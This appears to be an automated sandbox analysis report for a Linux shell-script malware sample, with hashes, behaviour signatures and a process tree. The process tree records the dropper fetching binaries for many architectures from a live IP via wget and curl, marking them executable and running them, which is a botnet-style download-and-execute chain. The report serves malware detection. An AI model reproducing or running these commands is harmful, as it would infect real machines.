Analysis
-
max time kernel
25s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
24/11/2024, 01:19
Static task
static1
Behavioral task
behavioral1
Sample
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
-
Size
1KB
-
MD5
513641f5f60d55559c2060489de6d605
-
SHA1
c95feec2255732b60d434b0639b88a5cff205ea0
-
SHA256
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd
-
SHA512
71ee20fe10e58b1d9a0e0e5268ba264e35e15e3a5190cfdf5950245579fbbdabd9aef7dc11e9398e0df8add1afb1400a0134911b6ebb9deb937b578fc52775e0
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1549 chmod 1555 chmod 1561 chmod 1567 chmod 1573 chmod 1579 chmod 1525 chmod 1531 chmod 1537 chmod 1543 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/3AvA 1526 3AvA /tmp/3AvA 1532 3AvA /tmp/3AvA 1538 3AvA /tmp/3AvA 1544 3AvA /tmp/3AvA 1550 3AvA /tmp/3AvA 1556 3AvA /tmp/3AvA 1562 3AvA /tmp/3AvA 1568 3AvA /tmp/3AvA 1574 3AvA /tmp/3AvA 1580 3AvA -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1532 3AvA 1528 wget 1529 curl 1530 cat -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/3AvA 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
Processes
-
/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh1⤵
- Writes file to tmp directory
PID:1517 -
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.x862⤵PID:1518
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.x862⤵PID:1520
-
-
/bin/catcat UnHAnaAW.x862⤵PID:1524
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM42⤵
- File and Directory Permissions Modification
PID:1525
-
-
/tmp/3AvA./3AvA x862⤵
- Executes dropped EXE
PID:1526
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.mips2⤵
- System Network Configuration Discovery
PID:1528
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.mips2⤵
- System Network Configuration Discovery
PID:1529
-
-
/bin/catcat UnHAnaAW.mips2⤵
- System Network Configuration Discovery
PID:1530
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM42⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/3AvA./3AvA mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1532
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.mpsl2⤵PID:1534
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.mpsl2⤵PID:1535
-
-
/bin/catcat UnHAnaAW.mpsl2⤵PID:1536
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM42⤵
- File and Directory Permissions Modification
PID:1537
-
-
/tmp/3AvA./3AvA mpsl2⤵
- Executes dropped EXE
PID:1538
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.arm42⤵PID:1540
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.arm42⤵PID:1541
-
-
/bin/catcat UnHAnaAW.arm42⤵PID:1542
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM42⤵
- File and Directory Permissions Modification
PID:1543
-
-
/tmp/3AvA./3AvA arm42⤵
- Executes dropped EXE
PID:1544
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.arm52⤵PID:1546
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.arm52⤵PID:1547
-
-
/bin/catcat UnHAnaAW.arm52⤵PID:1548
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM42⤵
- File and Directory Permissions Modification
PID:1549
-
-
/tmp/3AvA./3AvA arm52⤵
- Executes dropped EXE
PID:1550
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.arm62⤵PID:1552
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.arm62⤵PID:1553
-
-
/bin/catcat UnHAnaAW.arm62⤵PID:1554
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM42⤵
- File and Directory Permissions Modification
PID:1555
-
-
/tmp/3AvA./3AvA arm62⤵
- Executes dropped EXE
PID:1556
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.arm72⤵PID:1558
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.arm72⤵PID:1559
-
-
/bin/catcat UnHAnaAW.arm72⤵PID:1560
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM42⤵
- File and Directory Permissions Modification
PID:1561
-
-
/tmp/3AvA./3AvA arm72⤵
- Executes dropped EXE
PID:1562
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.ppc2⤵PID:1564
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.ppc2⤵PID:1565
-
-
/bin/catcat UnHAnaAW.ppc2⤵PID:1566
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM42⤵
- File and Directory Permissions Modification
PID:1567
-
-
/tmp/3AvA./3AvA ppc2⤵
- Executes dropped EXE
PID:1568
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.m68k2⤵PID:1570
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.m68k2⤵PID:1571
-
-
/bin/catcat UnHAnaAW.m68k2⤵PID:1572
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM42⤵
- File and Directory Permissions Modification
PID:1573
-
-
/tmp/3AvA./3AvA m68k2⤵
- Executes dropped EXE
PID:1574
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.sh42⤵PID:1576
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.sh42⤵PID:1577
-
-
/bin/catcat UnHAnaAW.sh42⤵PID:1578
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM42⤵
- File and Directory Permissions Modification
PID:1579
-
-
/tmp/3AvA./3AvA sh42⤵
- Executes dropped EXE
PID:1580
-